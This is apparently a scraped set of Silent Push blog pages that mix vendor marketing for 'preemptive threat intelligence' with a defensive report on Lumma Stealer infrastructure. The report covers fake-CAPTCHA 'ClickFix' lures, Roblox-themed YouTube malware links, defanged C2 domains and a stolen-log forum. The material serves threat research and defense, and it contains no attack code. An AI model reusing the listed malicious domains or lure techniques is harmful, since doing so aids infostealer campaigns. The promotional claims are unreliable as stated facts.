Security teams strive to be on the offensive by identifying emerging threats before they surface and have a chance to do damage. Such threat detection strategies are used across the board in multiple industries, including finance, government and healthcare.
Unfortunately, using a standard approach to threat intelligence and threat hunting often puts them on the defensive, as they’re forced to sift through outdated intelligence that eats into their response time.
Given that only 2% of global threat infrastructure is being tracked in cybersecurity at any given time, organizations simply don’t have the ability to obtain a complete view of any given threat landscape, and are forced to reactively mitigate attacks that originate from the hidden 98%.
In this blog, we’ll explain how to plan an offensive strategy with a complete view of attacker infrastructure to protect your organization, and describe how Silent Push facilitates fast, accurate proactive threat detection using Indicators of Future Attack™ (IOFA)™.
What is the Difference Between Proactive vs. Reactive Threat Detection?
Proactive threat detection locates and stops carefully orchestrated cyber attacks before they cause damage.
In boxing, there’s an old saying – “hit and don’t get hit”. A fighter who has the ability to be on the offensive minimizes the amount of hits their opponent can make, causing them to become preoccupied with defending themselves rather than attacking.
A proactive security team doesn’t sit back and wait for the punches to come to them. They understand their attack surface, they know how they’re going to be targeted – and by who – and they take the fight to the threat actor by shutting down digital assaults before they’re launched with industry-leading Indicators of Future Attack™ (IOFA)™.
Reactive security teams fight behind their gloves, and hope for the best by dealing with incidents at the perimeter, rather than going out on the attack and proactively locating threat infrastructure. Sooner or later, one of those punches will get through, and that’s when the knockout blow comes in the form of a breach.
They rely on stale lists of post-breach IOCs that only serve to inform defenders about where an attack has come from, rather than where it’s going to be.
Reactive teams formulate a defense as a REACTION to an attack that has occurred elsewhere. They aren’t able to ascertain where an adversary is going to strike before they attack, and in the dark about the infrastructure being set up.
If your teams aren’t proactively tracking and monitoring both emerging and active threat infrastructure, the knockout blow is just around the corner, your potential exposure to an attack increases, and with it the chances of a costly breach.
Proactively Identify Threat Actor Tactics
Preemptive threat intelligence allows you to proactively identify threat infrastructure as it’s being set up, and before an adversary launches an attack.
It’s the only reliable way to outsmart adversaries and take control back.
Security teams need to do away with a reactive, IOC-led approach to threat intelligence and focus on the underlying tactics and strategies used by threat actors that tracks the deployment of infrastructure, rather than simply dealing with the individual domains and IPs used in a previous attack.
How Does Silent Push Help You Develop an Offensive Approach to Protect Your Organization?
Silent Push is the first and only threat intelligence solution to deliver IOFA™ and create a unique digital fingerprint of adversary behavior that allow teams to adopt a fully proactive stance by eliminating incoming attacks before they’re launched.
Our feeds and intelligence streams aren’t made up of retrospective, reactive indicators of previous threat activity. IOFA™ provide your teams with a glimpse into the future, so that you can anticipate and react to emerging threats way before they reach your organization.
We are the only solution to understand the full attack landscape, and provide this to SOC and IR teams in a way that’s immediately actionable, and doesn’t take up precious time and resources to further investigate and validate before it’s useable.
Click here to get access to an exclusive report that outlines 4 key cyber threat trends to keep ahead of in 2025, and learn about:
How and where threat actors use these tactics
Named adversaries and intent
How to combat threats with Indicators of Future Attack (IOFA)™
Learn more about our unique approach to Preemptive Threat Intelligence
Find out how your organization can use Preemptive Threat Intelligence to outsmart adversaries and stop attacks before they’re launched.
We found Lumma Stealer command and control (C2) domain clusters share certain technical characteristics that enabled our team to map entire clusters of the infostealer’s infrastructure.
Lumma Stealer logs are being shared for free on Leaky[.]pro, a relatively new hacking forum, offering billions of “URL:LOG:PASS” records with specific details tied to stolen credentials.
The increase in malware being spread via malicious YouTube links and infected files disguised in videos, comments, or descriptions is alarming. Viewers should be skeptical of unverified sources when interacting with YouTube content, particularly when prompted to download or click on links.
Silent Push Threat Analysts recently expanded on our previous research on “Lumma Stealer” infostealer malware from January of last year. Among the new discoveries, our team found Lumma Stealer logs are being shared for free on Leaky[.]pro, a relatively new hacking forum.
Difficult to detect and prevent, Lumma Stealer malware is spread through various platforms such as video-sharing sites, file-sharing services, and directly through malicious websites. Lumma Stealer infections typically act as enablers for more extensive attacks, including the deployment of ransomware and espionage operations, where attackers gather intelligence or steal intellectual property.
Our team discovered that Lumma Stealer C2 domain clusters are frequently registered in quick succession and, in many cases, appear to be handled via an automated process. These clusters and infrastructure expansion techniques share certain characteristics that our threat analysts have combined to fingerprint Lumma Stealer infrastructure.
The ever-evolving nature of Lumma Stealer campaigns, which often lead to widespread infections, outlines the need for robust, industry-wide cybersecurity measures to mitigate the potential damage they can cause. Frequent targets include YouTube, the content delivery network (CDN) Cloudflare, and the file-sharing platform/cloud storage company MediaFire. These companies cannot fight this threat alone, however, so Silent Push Threat Analysts are sharing our latest research to help defenders mitigate and prevent the spread of Lumma Stealer infections.
Sign Up for a Free Silent Push Community Account
Register now for our free Community Edition to use all the tools and queries mentioned in this blog.
Lumma Stealer was first seen on Russian-language criminal forums in 2022. It continues to be sold under the “Malware-as-a-Service” business model, with different pricing tiers for threat actor operations of varying sizes. From 2023 onward, the number of compromises linked to Lumma Stealer has risen dramatically, particularly those including the resale of stolen credentials to other criminals.
“Infostealer” malware, like Lumma Stealer, refers to malware designed primarily to collect sensitive information (login credentials, browser history, credit card details, and other personal data) from infected systems. Lumma Stealer goes even further, targeting web browser information (cookies, history, extensions, and saved passwords), chat logs, details about installed programs, stored financial information, and even cryptocurrency wallet data. Lumma also targets multiple versions of the Windows operating system.
Malware distribution mechanisms for Lumma Stealer vary greatly depending on the motivation of the specific operator deploying it. Cybercriminals use “stealer logs” (files generated by malware like Lumma Stealer with sensitive information from compromised systems) to exploit stolen data for all types of fraudulent activities, including identity theft. The most effective campaigns seen by our team thus far have also utilized “malvertising” (malicious advertisements) on popular search engines and “malspam” (malicious spam emails) containing harmful attachments.
In this latest report, our threat analysts observed that threat actors using Lumma Stealer appear to register clusters of roughly 10-20 domains at a time, some of which are used immediately and others that are left to age for up to two weeks. Knowing this, we can then search for and unearth the “aging” domains if even one of the active domains can be found.
Our team believes readers of this report should be aware of the increase in malware spread via YouTube. Malicious links and infected files are often disguised in videos, comments, or descriptions. Exercising caution and being skeptical of unverified sources when interacting with YouTube content, especially when prompted to download or click on links, can help protect against these growing threats.
Note: Our threat analysts have noticed malicious actors often change their infrastructure and tactics based on the details included in our public blog posts, so we have omitted many of the key details needed to circumvent detection from this post for operational security reasons. Enterprise customers have access to a fully detailed report on Lumma Stealer’s methods as well as IOFA™ feeds that enable easy blocking of all associated infrastructure.
Exploring Lumma Stealer Practices
Initial Intelligence: Lumma Stealer Logs’ Distribution
Silent Push Threat Analysts discovered a user, “zhack,” on the popular hacking forum BreachForums, who was advertising and distributing Lumma Stealer logs.
User “zhack” shared Lumma Stealer logs on BreachForums
Leaky[.]pro was promoted within the logs
The hacking forum leaky[.]pro was relatively new. The administrator made the first post on 12/29/2024 under the name “fijiwater.”
Leaky[.]pro administrator “fijiwater”
The screenshot below shows a user on the Leaky[.]pro forum advertising three billion records of “URL:LOG:PASS” that refer to stealer logs with specific website URLs tied to logins (LOG) and passwords (PASS) of stolen credentials.
A leaky[.]pro forum user advertised 3,000,000,000 URL:LOG:PASS records
The Fake Booking “ClickFix” Technique to Deliver Lumma Stealer
Silent Push Threat Analysts know that organizations and sites with large user bases are commonly victims of phishing and malware campaigns. Our team was able to create a proprietary fingerprint based on observation of these campaigns that detects a large number of phishing pages, including those located on a suspected bulletproof host.
Delving deeper into these suspicious booking pages our team quickly found they were delivering Lumma Stealer through a fake Cloudflare CAPTCHA, an example of which can be seen below.
The first stage of the fake CAPTCHA
After checking the box for “I’m not a robot,” this message popped up:
Screenshot of the second stage of the fake CAPTCHA / ClickFix page
The presence of “I am not a robot – reCAPTCHA Verification ID: 8731” within the URL suggested that the malware may have attempted to deceive security systems or users by mimicking legitimate reCAPTCHA verification processes, making it appear as though the .HTA file was part of a standard web interaction.
This technique, also known as “ClickFix,” involves cybercriminals creating fake CAPTCHA pages, often mimicking Cloudflare’s verification system, to trick users into running malicious code. The malware can steal sensitive data, including login credentials, or install harmful software.
Following the Surge of Malware as Fake Exploits Fuel Massive Infections through Malicious Sites and YouTube
Silent Push Threat Analysts detected a Lumma Stealer sample being spread through the interactive online malware analysis sandbox, any[.]run. We then expanded our search within our platform and were able to pivot toward more malicious infrastructure spreading Lumma Stealer.
Our team detected a Lumma Stealer sample in the any[.]run platform
Using information derived from this sample, “roxplo1ts[.]ws:443/wave,” our team was able to create yet another proprietary fingerprint that led to more malicious infrastructure.
The malicious site roxplo1ts[.]ws:443/wave
These domains revealed an interesting HTML title, “Roblox #1 Xeno Executor,” that can be readily searched upon with our Silent Push Web Scanner. This campaign appeared to be targeting children who play the Roblox game, which had roughly 164 million monthly active users in 2020. By focusing on the HTML title used here, we were able to combine additional technical details to create yet another effective fingerprint.
A YouTube search using the various pieces of information derived from our searches within the Silent Push Web Scanner revealed a disturbing number of YouTube videos spreading malware through MediaFire links. These videos also appeared to be from compromised accounts that were, themselves, victims.
Examples of suspicious exploits being advertised through YouTube
In testing one of these examples, youtube[.]com/watch?v=d_D4kgSVDIk. Our team noted a description which led potential victims to a download link hosted outside of YouTube, along with suspect hashtags included in the description. That link took victims to the external site: “deckarenids[.]com/roblox-executor”.
Description from the suspicious video: youtube[.]com/watch?v=d_D4kgSVDIk
This follows the same pattern we have previously observed with Lumma Stealer; however, in this case, before downloading the suspicious file, the victim was required to watch a YouTube video. This strongly suggested that the threat actors were using this tactic to harvest views and manipulate the YouTube algorithm.
A visitor to lootdest[.]org/s?4d456215 was required to watch a YouTube video to unlock the content
We determined the suspicious file, seen here on Virus Total, was not actually Lumma Stealer. This indicated other methods are also being utilized by these actors in order to spread their campaigns. Bearing this in mind, our team was able to produce additional unique fingerprints to hunt for similarly suspect sites that may spread either Lumma Stealer or other types of malware.
Given the large scale of activity, our team is monitoring these results carefully and continuously iterating upon our fingerprinting techniques in order to stay ahead of the threat actors regardless of the type of malware used.
Unique Lumma Stealer Poem Leads to SecTopRAT Malware
In our earlier research, we hypothesized that Lumma Stealer’s administrators amended their C2 infrastructure to point at the generic Russian poem based on some sort of personal preference. Further investigation showed that some domains shifted from the poetry page to a Lumma Stealer control panel. We thus used the content of the poetry page to scan our database for Lumma C2 domains and IP addresses displaying the same content.
What we observed is over the last few years this threat actor group has changed the unique poem we had originally (and have) been tracking.
A sample domain that shows the new version of the “Sergei Yesenin” poem on c3.digital-odyssey[.]shop
All domains identified using this Russian poem were then further analyzed, allowing us to create yet another unique fingerprint to identify Lumma Stealer infrastructure. The web page of one, “docu-signer[.]com”, began with the following information thrust up on the screen:
docu-signer[.]com web page
In the next step, the visitors are instructed to download a malicious “PDF,” seen here in Virus Total.
The page docu-signer[.]com downloads a malicious PDF
This particular file is actually a Windows shortcut “LNK” file, and on further examination of the file and the associated email, our threat analysts determined it was malware that made use of SecTopRAT as a C2.
*Note: Our team is conducting an ongoing investigation to determine the connection between SecTopRAT C2 and Lumma Stealer and will share our findings as we determine more.
Intrusion detection system (IDS) rules hitting SecTopRAT C2 communication from VirusTotal as the source
Lumma Stealer Malware Spread Through Cloudflare and MediaFire
A well-known security researcher that goes by the name of Fox_threatintel on X (formerly Twitter) (https://x.com/banthisguy9349/status/1866434351614796165) tagged the Silent Push Threat Intelligence Team in a post pointing out suspicious clusters spreading MediaFire links with password protection on the .zip archives through Cloudflare hosted sites.
Examining the associated infrastructure revealed multiple methods by which our team was able to fingerprint it, leading to further clusters of infrastructure spreading Lumma Stealer.
Example of threat actors spreading Lumma Stealer through English and Persian language sites on workingkeys[.]info
Three additional clusters were found through the information contained in the Fox_Threatintel post. From those, we were able to create unique fingerprints to identify each as they continue to spread and evolve.
Spreading Lumma Stealer through English and Arabic Language “File Download” on techetrs[.]icu
New Lumma Stealer C2 login panel on mikhail-lermontov[.]com
Said results also displayed infrastructure details consistent with those we shared in our public blog on Lumma Stealer in 2023, which was nice confirmation of the effectiveness of our current methods.
Older version of Lumma Stealer login panel on 213.252.244[.]62
Lumma Stealer C2 Domain Clusters
Pivoting on a confirmed Lumma domain within our WHOIS scanner revealed additional details our team was able to use across multiple results, many of which were marked as Lumma Stealer C2s in public sources. We noted similarities in the resulting domains’ names as well as reuse of top-level domains (TLDs) such as “.pro”, “.shop”, etc..
Below is an example of one of the new results, tinpanckakgou[.]shop (source: VirusTotal) that was marked as “malicious” by 19 different vendors. The domain had multiple communicating files containing Lumma Stealer. This provided additional confidence that the results of this cluster were related to Lumma Stealer.
Reviewing a new result in VirusTotal – noting links to malicious files
Expanding upon that cluster revealed more than 60 results, all of them featured the same naming schema and a TLD of “.shop.” Additional discoveries were made at this stage, but are too sensitive to refer to publicly without tipping off the threat actors. Suffice to say a significant number of the new results were linked to Lumma Stealer samples, though they showed fewer hits on VirusTotal.
Another new result reviewed in VirusTotal yielded one detection and a 33/72 associated file
In many cases, we saw domains marked as “clean” elsewhere, which our research team was able to confirm internally as Lumma C2 domains.
The results when we initially reviewed in VirusTotal: No known hits
It is evident from these results that VirusTotal and other antivirus vendors are often unable to promptly or proactively flag Lumma Stealer domains. This underscores the need for pre-emptive threat intelligence, which focuses on the discovery of infrastructure prior to activation for malicious use. With our data, one can effectively detect entire clusters of Lumma Stealer C2 domains the moment they are actively weaponized.
Silent Push shines in our capability to quickly identify and respond to emerging threats, providing clients with the enhanced level of security they expect in this era of rapidly scaling and emerging threats. Rest assured that our threat analyst team continues to work to stay ahead of attackers, and our IOFA™ feeds are continuously updated as new tactics, techniques, and procedures (TTPs) are observed.
Additional Information: Continuing to Track Lumma Stealer
As referenced before, key technical information has been omitted from this public blog for operational security.
We have published a TLP:Amber report for our Enterprise users that contains links to the specific queries, lookups, and scans we’ve used to identify and traverse Lumma Stealer infrastructure—including proprietary parameters that we’ve omitted from this blog for security reasons.
Silent Push will continue to report on our work tracking Lumma Stealer and share new findings with the community as our research progresses throughout 2025. If you or your organization have any leads related to this effort, particularly those being used by these threat actors, we would love to hear from you.
Mitigation
Silent Push believes all Lumma Stealer-related domains present some level of risk.
Our analysts construct Silent Push IOFA Feeds that provide a growing list of Indicator of Future Attack™ data focused on scams supported by this technique.
Silent Push Indicators of Future Attack™ (IOFA™) Feeds are available as part of an Enterprise subscription. Enterprise users can ingest IOFA™ Feed data into their security stack to inform their detection protocols or use it to pivot across attacker infrastructure using the Silent Push Console and Feed Analytics screen.
Register for Community Edition
Silent Push Community Edition is a free threat-hunting and cyber defense platform featuring a range of advanced offensive and defensive lookups, web content queries, and enriched data types.
Sample Lumma Stealer Indicators of Future Attacks (IOFA™)
Below is a sample list of IOFA™ associated with Lumma Stealer. Our full list is available for enterprise users. Silent Push Enterprise clients have access to a domain feed containing all Lumma Stealer infrastructure, several IOFA™ Feeds for malware sites that distribute Lumma Stealer and other malware families, and an IOFA feed built to track malicious actors spreading Lumma Stealer based on WHOIS information.
In this blog, we’ll explore how Preemptive Threat Intelligence acts as an early warning system by using a threat actor’s own tactics against them, forming a comprehensive picture of how a threat campaign is prepped and launched, so that security teams can proactively defend themselves against known and hidden attacks using Indicators of Future Attack™ (IOFA)™.
How to stop an attack by knowing threat actor tactics and behavior
Preemptive Threat Intelligence allows security teams to locate and block the 98% of global threat infrastructure that’s yet to be discovered, and lurking under the surface.
Most importantly, it helps you head off any future attacks by knowing where threat actors are going to strike, based on how they behave.
When a law enforcement agency needs to find and arrest a perpetrator, they gather as much information they can on the person to understand where they are, and where they’re going to strike next.
We’ve all watched crime shows where the agency builds a file to capture who a criminal associated with, what methods they use to commit a crime, what their motive is, and any other crimes they’re involved in. They also look for behaviors to document such as places they frequent, company they keep, and even what brand of cigarettes they smoke.
All of this enables the good guys to be one step ahead of the bad guys, and lay a trap to put them behind bars.
How does Silent Push profile attacker behavior?
At Silent Push, Preemptive Threat Intelligence works in a similar way, but in the digital world.
Instead of only relying on information that’s easily obtainable and available everywhere – such as a domain that’s already been involved in an attack – it’s essential to understand a threat actors’ motivation and modus operandi, and use their own methods as identifiers against them to anticipate and prevent any future attacks.
Silent Push achieves this through our unique digital behavioral fingerprinting process.
We go beyond stale lists of post-breach IOCs, and help security teams to proactively profile threat actor behavior in a way that makes it easy to understand how they set up their infrastructure before an attack, and where to expect the next digital assault.
Our digital behavioral fingerprint breaks down a domain, website or IP address into hundreds of searchable categories, and connects the dots between billions of datapoints across the Internet by giving security teams a comprehensive criminal profile of online threat activity, wherever it occurs and whoever is propagating it.
How does Silent Push provide a cyber early warning system to stop hidden attacks?
Behavioral fingerprints and IOFA™ are unique to Silent Push. No other threat intelligence provider has the same ability to scan, aggregate, and correlate global Internet data, and deliver it in a way that makes it immediately actionable, and easy to use, in the form of IOFA™.
Think of all the questions your team needs to answer as they track down malicious infrastructure targeting your organization…
What favicon is that brand impersonation site using that’s targeting your organization, and what are all the other domains that have ever used that favicon? What domains are linked with the same nameserver? How has that threat actor moved between different hosting providers? Where are they now, where have they been before, and where are they likely to go to next? How does that website interact with users, and what other sites behave in the same way?
All of this, and more, is available only within Silent Push.
Learn more about our unique approach to Preemptive Threat Intelligence
Find out how your organization can use Preemptive Threat Intelligence to outsmart adversaries and stop attacks before they’re launched.
In the evolving landscape of cyber threats, attackers are increasingly exploiting legitimate cloud services to mask their malicious activities – a tactic we term “Infrastructure Laundering.”
By renting IP addresses from reputable providers like Amazon Web Services and Microsoft Azure, threat actors such as the FUNNULL content delivery network (CDN) can seamlessly integrate illicit operations into mainstream infrastructure. This approach not only complicates detection but also challenges traditional security measures.
Access Webinar
What we cover:
In this session, Silent Push Director of Threat Intelligence Kasey Best covers:
What is Infrastructure Laundering?
The evolution of adversaries: How and why threat actors are jumping on this trend
How to detect Infrastructure Laundering in real-time with Silent Push preemptive threat intelligence
Case Study: Triad Nexus and FUNNULL CDN Infrastructure Laundering
Ethical concerns for Big Tech
Mitigation and Q&A
Who should watch:
Anyone seeking cutting-edge strategies to preemptively detect and mitigate threats.
Ready to dive deeper into the world of preemptive threat intelligence? Begin your journey with the Silent Push free Community Edition today.
Preemptive Threat Intelligence is the practice of identifying threat infrastructure as it’s being set up, and before an adversary launches an attack.
The data used in Preemptive Threat Intelligence provides teams with the ability to proactively respond to threats using enhanced insights, feeds and automated queries that reveal known and hidden infrastructure.
In this blog, we’ll explore the concept of preemptive threat intelligence by explaining how much of global threat infrastructure is know at any one time, and the need for organizations to adopt a preemptive approach to threat intelligence, before explaining how Silent Push is helping organizations to detect and block hidden threats quicker and more effectively with its unique Indicators of Future Attack™.
Did you know that only 2% of threat infrastructure is known?
Most security teams rely on inadequate threat intelligence data that does not reveal the full extent of an attack.
As little as 2% of the infrastructure used by a threat actor in an attack is being tracked at any given point in time, with the remainder lurking under the surface and out of reach of traditional detection methods.
This means that cyber defenders and threat hunters are operating mostly in the dark, as they attempt to understand where attacks originate from, and where they may appear next.
Organizations need to have the ability to go beyond the 2% that’s easily detectable, and dive under the surface of the water to establish just how far down the iceberg goes – and what it’s actually made of – to make sure they’re better positioned to prevent a breach.
Why is 98% of threat infrastructure hidden?
Like any criminal, threat actors continually change their attack strategies to cover their tracks, and avoid detection.
They understand and monitor traditional approaches to security that rely on stale lists (feeds) of domains and IPs that tell teams where an attack has BEEN, rather than where it’s coming FROM, and are constantly cycling through large amounts of infrastructure to cover their tracks.
These feeds do not contain all the linked infrastructure used by a threat actor, and only contain publicly known Indicators of Compromise (IOCs).
What if you could take one piece of infrastructure that is currently visible in an attack, and get insight on how it’s moved across the Internet, along with all the other pieces of Internet data it’s associated with, how its hosted (or has ever been hosted), and how it all fits together?
These are the elements that are impossible for teams to reveal using a standard approach, and this is what makes up the 98% that’s currently hidden to the rest of the security industry.
Why are organizations adopting Preemptive Threat Intelligence?
Let’s use an analogy. You’re lucky enough to own a large house, on a sprawling estate, with multiple potential entry points dotted around that need to be monitored and secured 24/7.
Would you rather rely on an alarm system that tells you when an intruder is at the door (or worse still, when they’re in your house), or would you prefer to get alerted when they’re on their way and before they get anywhere near your neighborhood, so that you can stop them before they get to you?
This is why security teams are pivoting away from legacy “at the gates” detection mechanisms.
Preemptive Threat Intelligence data needs to deliver a cyber early warning system that stops criminals before they arrive at your organization’s digital front door – wherever that may be.
How Silent Push Preemptive Threat Intelligence exposes threats and minimizes the risk of an attack
Silent Push was started in 2020 by security industry veterans to improve the world’s ability to counteract global cybercrime.
Our founders are determined to provide the most innovative solution to address the growing imbalance of security teams wasting time and resources fumbling around for information on hidden threat infrastructure, and increasing their organization’s exposure to an attack.
Silent Push is the first and ONLY cybersecurity platform to deliver Indicators Of Future Attack (IOFA)™ – immediately actionable preemptive threat intelligence data that informs teams where attacks are coming FROM, in addition to where hey have been.
Our early warning system stops the burglar from ever entering your neighbourhood, let alone your property, by giving your teams the ability to locate the 98% of threat infrastructure that they aren’t currently able to pinpoint.
We do this by mapping out the relationship between billions of Internet data points using proprietary technology that gives security teams a 360-degree picture of any given attack landscape.
Learn more about our unique approach to Preemptive Threat Intelligence
Find out how your organization can use Preemptive Threat Intelligence to reveal hidden infrastructure and stop attacks at source.
![The site leaky[.]pro was advertised within the logs](https://www.silentpush.com/wp-content/uploads/lumma-s-leaky-pro-image-2.png)
![Screenshot of Leaky[.]pro administrator "fijiwater"](https://www.silentpush.com/wp-content/uploads/lumma-s-fijiwater-image-3.png)
![A leaky[.]pro forum user advertised 3,000,000,000 URL:LOG:PASS records](https://www.silentpush.com/wp-content/uploads/lumma-s-leaky-pro-urllogpass-image-4.png)
![We detected a Lumma Stealer sample in the any[.]run platform](https://www.silentpush.com/wp-content/uploads/lumma-s-any-run-image-7.png)
![Description from the suspicious video: youtube[.]com/watch?v=d_D4kgSVDIk](https://www.silentpush.com/wp-content/uploads/lumma-s-youtube-roblox-description-image-10.png)
![A visitor to lootdest[.]org/s?4d456215 was required to watch a YouTube video to unlock the content](https://www.silentpush.com/wp-content/uploads/lumma-s-declaremods-roblox-image-11.png)
![Docu-signer[.]com web page](https://www.silentpush.com/wp-content/uploads/lumma-s-docu-signer-pdf-image-13.png)
![The page docu-signer[.]com downloads a malicious PDF](https://www.silentpush.com/wp-content/uploads/lumma-s-docu-signer-pdf-instrucutions-image-14.png)
![New Lumma Stealer C2 login panel on mikhail-lermontov[.]com](https://www.silentpush.com/wp-content/uploads/lumma-s-new-login-panel-image-18.png)
![Older version of Lumma Stealer login panel on 213.252.244[.]62](https://www.silentpush.com/wp-content/uploads/lumma-s-old-login-russian-panel-image-19.png)
